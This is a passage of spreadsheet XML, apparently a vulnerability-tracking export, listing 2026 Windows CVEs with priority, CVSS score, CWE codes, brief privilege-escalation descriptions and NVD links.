      <c r="M3390" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69299</t>
        </is>
      </c>
    </row>
    <row r="3391">
      <c r="A3391" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3391" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69300</t>
        </is>
      </c>
      <c r="C3391" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3391" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3391" s="5" t="inlineStr"/>
      <c r="F3391" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3391" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3391" s="5" t="inlineStr"/>
      <c r="I3391" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3391" s="5" t="inlineStr"/>
      <c r="K3391" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3391" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Push Notifications allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3391" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69300</t>
        </is>
      </c>
    </row>
    <row r="3392">
      <c r="A3392" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3392" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69309</t>
        </is>
      </c>
      <c r="C3392" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3392" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3392" s="5" t="inlineStr"/>
      <c r="F3392" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3392" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3392" s="5" t="inlineStr"/>
      <c r="I3392" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3392" s="5" t="inlineStr"/>
      <c r="K3392" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="L3392" s="5" t="inlineStr">
        <is>
          <t>Double free in Windows Print Spooler Components allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3392" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69309</t>
        </is>
      </c>
    </row>
    <row r="3393">
      <c r="A3393" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3393" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69310</t>
        </is>
      </c>
      <c r="C3393" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3393" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3393" s="5" t="inlineStr"/>
      <c r="F3393" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3393" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3393" s="5" t="inlineStr"/>
      <c r="I3393" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3393" s="5" t="inlineStr"/>
      <c r="K3393" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3393" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DNS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3393" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69310</t>
        </is>
      </c>
    </row>
    <row r="3394">
      <c r="A3394" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3394" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69311</t>
        </is>
      </c>
      <c r="C3394" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3394" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3394" s="5" t="inlineStr"/>
      <c r="F3394" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3394" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3394" s="5" t="inlineStr"/>
      <c r="I3394" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3394" s="5" t="inlineStr"/>
      <c r="K3394" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3394" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3394" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69311</t>
        </is>
      </c>
    </row>
    <row r="3395">
      <c r="A3395" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3395" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69319</t>
        </is>
      </c>
      <c r="C3395" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3395" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3395" s="5" t="inlineStr"/>
      <c r="F3395" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3395" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3395" s="5" t="inlineStr"/>
      <c r="I3395" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3395" s="5" t="inlineStr"/>
      <c r="K3395" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="L3395" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows USB Video Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3395" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69319</t>
        </is>
      </c>
    </row>
    <row r="3396">
      <c r="A3396" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3396" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69331</t>
        </is>
      </c>
      <c r="C3396" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3396" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3396" s="5" t="inlineStr"/>
      <c r="F3396" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3396" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3396" s="5" t="inlineStr"/>
      <c r="I3396" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3396" s="5" t="inlineStr"/>
      <c r="K3396" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3396" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Access Connection Manager allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3396" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69331</t>
        </is>
      </c>
    </row>
    <row r="3397">
      <c r="A3397" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3397" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69333</t>
        </is>
      </c>
      <c r="C3397" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3397" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3397" s="5" t="inlineStr"/>
      <c r="F3397" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3397" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3397" s="5" t="inlineStr"/>
      <c r="I3397" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3397" s="5" t="inlineStr"/>
      <c r="K3397" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3397" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3397" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69333</t>
        </is>
      </c>
    </row>
    <row r="3398">
      <c r="A3398" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3398" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69335</t>
        </is>
      </c>
      <c r="C3398" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3398" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3398" s="5" t="inlineStr"/>
      <c r="F3398" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3398" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3398" s="5" t="inlineStr"/>
      <c r="I3398" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3398" s="5" t="inlineStr"/>
      <c r="K3398" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3398" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3398" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69335</t>
        </is>
      </c>
    </row>
    <row r="3399">
      <c r="A3399" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3399" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69341</t>
        </is>
      </c>
      <c r="C3399" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3399" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3399" s="5" t="inlineStr"/>
      <c r="F3399" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3399" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3399" s="5" t="inlineStr"/>
      <c r="I3399" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3399" s="5" t="inlineStr"/>
      <c r="K3399" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3399" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Image Acquisition allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3399" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69341</t>
        </is>
      </c>
    </row>
    <row r="3400">
      <c r="A3400" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3400" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69362</t>
        </is>
      </c>
      <c r="C3400" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3400" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3400" s="5" t="inlineStr"/>
      <c r="F3400" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3400" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3400" s="5" t="inlineStr"/>
      <c r="I3400" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3400" s="5" t="inlineStr"/>
      <c r="K3400" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3400" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3400" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69362</t>
        </is>
      </c>
    </row>
    <row r="3401">
      <c r="A3401" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3401" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69379</t>
        </is>
      </c>
      <c r="C3401" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3401" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3401" s="5" t="inlineStr"/>
      <c r="F3401" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3401" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3401" s="5" t="inlineStr"/>
      <c r="I3401" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3401" s="5" t="inlineStr"/>
      <c r="K3401" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="L3401" s="5" t="inlineStr">
        <is>
          <t>Improper link resolution before file access ('link following') in Windows NTFS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3401" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69379</t>
        </is>
      </c>
    </row>
    <row r="3402">
      <c r="A3402" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3402" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69383</t>
        </is>
      </c>
      <c r="C3402" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3402" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3402" s="5" t="inlineStr"/>
      <c r="F3402" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3402" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3402" s="5" t="inlineStr"/>
      <c r="I3402" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3402" s="5" t="inlineStr"/>
      <c r="K3402" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="L3402" s="5" t="inlineStr">
        <is>
          <t>External control of file name or path in Windows Shell allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3402" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69383</t>
        </is>
      </c>
    </row>
    <row r="3403">
      <c r="A3403" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3403" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69385</t>
        </is>
      </c>
      <c r="C3403" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3403" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3403" s="5" t="inlineStr"/>
      <c r="F3403" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3403" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3403" s="5" t="inlineStr"/>
      <c r="I3403" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3403" s="5" t="inlineStr"/>
      <c r="K3403" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="L3403" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows TCP/IP allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3403" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69385</t>
        </is>
      </c>
    </row>
    <row r="3404">
      <c r="A3404" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3404" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69388</t>
        </is>
      </c>
      <c r="C3404" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3404" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3404" s="5" t="inlineStr"/>
      <c r="F3404" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3404" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3404" s="5" t="inlineStr"/>
      <c r="I3404" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3404" s="5" t="inlineStr"/>
      <c r="K3404" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3404" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Bluetooth Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3404" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69388</t>
        </is>
      </c>
    </row>
    <row r="3405">
      <c r="A3405" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3405" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69394</t>
        </is>
      </c>
      <c r="C3405" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3405" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3405" s="5" t="inlineStr"/>
      <c r="F3405" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3405" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3405" s="5" t="inlineStr"/>
      <c r="I3405" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3405" s="5" t="inlineStr"/>
      <c r="K3405" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L3405" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3405" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69394</t>
        </is>
      </c>
    </row>
    <row r="3406">
      <c r="A3406" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3406" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69398</t>
        </is>
      </c>
      <c r="C3406" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3406" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3406" s="5" t="inlineStr"/>
      <c r="F3406" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3406" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3406" s="5" t="inlineStr"/>
      <c r="I3406" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3406" s="5" t="inlineStr"/>
      <c r="K3406" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-415</t>
        </is>
      </c>
      <c r="L3406" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Bluetooth Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3406" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69398</t>
        </is>
      </c>
    </row>
    <row r="3407">
      <c r="A3407" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3407" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69401</t>
        </is>
      </c>
      <c r="C3407" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3407" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3407" s="5" t="inlineStr"/>
      <c r="F3407" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3407" s="5" t="inlineStr"/>
      <c r="H3407" s="5" t="inlineStr"/>
      <c r="I3407" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3407" s="5" t="inlineStr"/>
      <c r="K3407" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3407" s="5" t="inlineStr">
        <is>
          <t>Use after free in Audio Video Control Transport Protocol allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3407" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69401</t>
        </is>
      </c>
    </row>
    <row r="3408">
      <c r="A3408" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3408" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69404</t>
        </is>
      </c>
      <c r="C3408" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3408" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3408" s="5" t="inlineStr"/>
      <c r="F3408" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3408" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3408" s="5" t="inlineStr"/>
      <c r="I3408" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3408" s="5" t="inlineStr"/>
      <c r="K3408" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="L3408" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows TCP/IP allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3408" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69404</t>
        </is>
      </c>
    </row>
    <row r="3409">
      <c r="A3409" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3409" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69410</t>
        </is>
      </c>
      <c r="C3409" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3409" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3409" s="5" t="inlineStr"/>
      <c r="F3409" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3409" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3409" s="5" t="inlineStr"/>
      <c r="I3409" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3409" s="5" t="inlineStr"/>
      <c r="K3409" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3409" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Win32K allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3409" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69410</t>
        </is>
      </c>
    </row>
    <row r="3410">
      <c r="A3410" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3410" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69413</t>
        </is>
      </c>
      <c r="C3410" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3410" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3410" s="5" t="inlineStr"/>
      <c r="F3410" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3410" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3410" s="5" t="inlineStr"/>
      <c r="I3410" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3410" s="5" t="inlineStr"/>
      <c r="K3410" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3410" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3410" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69413</t>
        </is>
      </c>
    </row>
    <row r="3411">
      <c r="A3411" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3411" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69422</t>
        </is>
      </c>
      <c r="C3411" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3411" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3411" s="5" t="inlineStr"/>
      <c r="F3411" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3411" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3411" s="5" t="inlineStr"/>
      <c r="I3411" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3411" s="5" t="inlineStr"/>
      <c r="K3411" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3411" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows USB Video Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3411" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69422</t>
        </is>
      </c>
    </row>
    <row r="3412">
      <c r="A3412" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3412" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69430</t>
        </is>
      </c>
      <c r="C3412" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3412" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3412" s="5" t="inlineStr"/>
      <c r="F3412" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3412" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3412" s="5" t="inlineStr"/>
      <c r="I3412" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3412" s="5" t="inlineStr"/>
      <c r="K3412" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3412" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Embedded Mode Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3412" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69430</t>
        </is>
      </c>
    </row>
    <row r="3413">
      <c r="A3413" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3413" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69440</t>
        </is>
      </c>
      <c r="C3413" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3413" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3413" s="5" t="inlineStr"/>
      <c r="F3413" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3413" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3413" s="5" t="inlineStr"/>
      <c r="I3413" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3413" s="5" t="inlineStr"/>
      <c r="K3413" s="5" t="inlineStr">
        <is>
          <t>CWE-367</t>
        </is>
      </c>
      <c r="L3413" s="5" t="inlineStr">
        <is>
          <t>Time-of-ch</t>
        </is>
      </c>
      <c r="M3413" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69440</t>
        </is>
      </c>
    </row>
    <row r="3414">
      <c r="A3414" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3414" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69441</t>
        </is>
      </c>
      <c r="C3414" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3414" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3414" s="5" t="inlineStr"/>
      <c r="F3414" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3414" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3414" s="5" t="inlineStr"/>
      <c r="I3414" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3414" s="5" t="inlineStr"/>
      <c r="K3414" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-416</t>
        </is>
      </c>
      <c r="L3414" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Installer allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M3414" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69441</t>
        </is>
      </c>
    </row>
    <row r="3415">
      <c r="A3415" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3415" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69448</t>
        </is>
      </c>
      <c r="C3415" s="5" t="n">
        <v>7</v>
      </c>
      <c r="D3415" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3415" s="5" t="inlineStr"/>
      <c r="F3415" s="5" t="n">
        <v>0.002</v>
      </c>
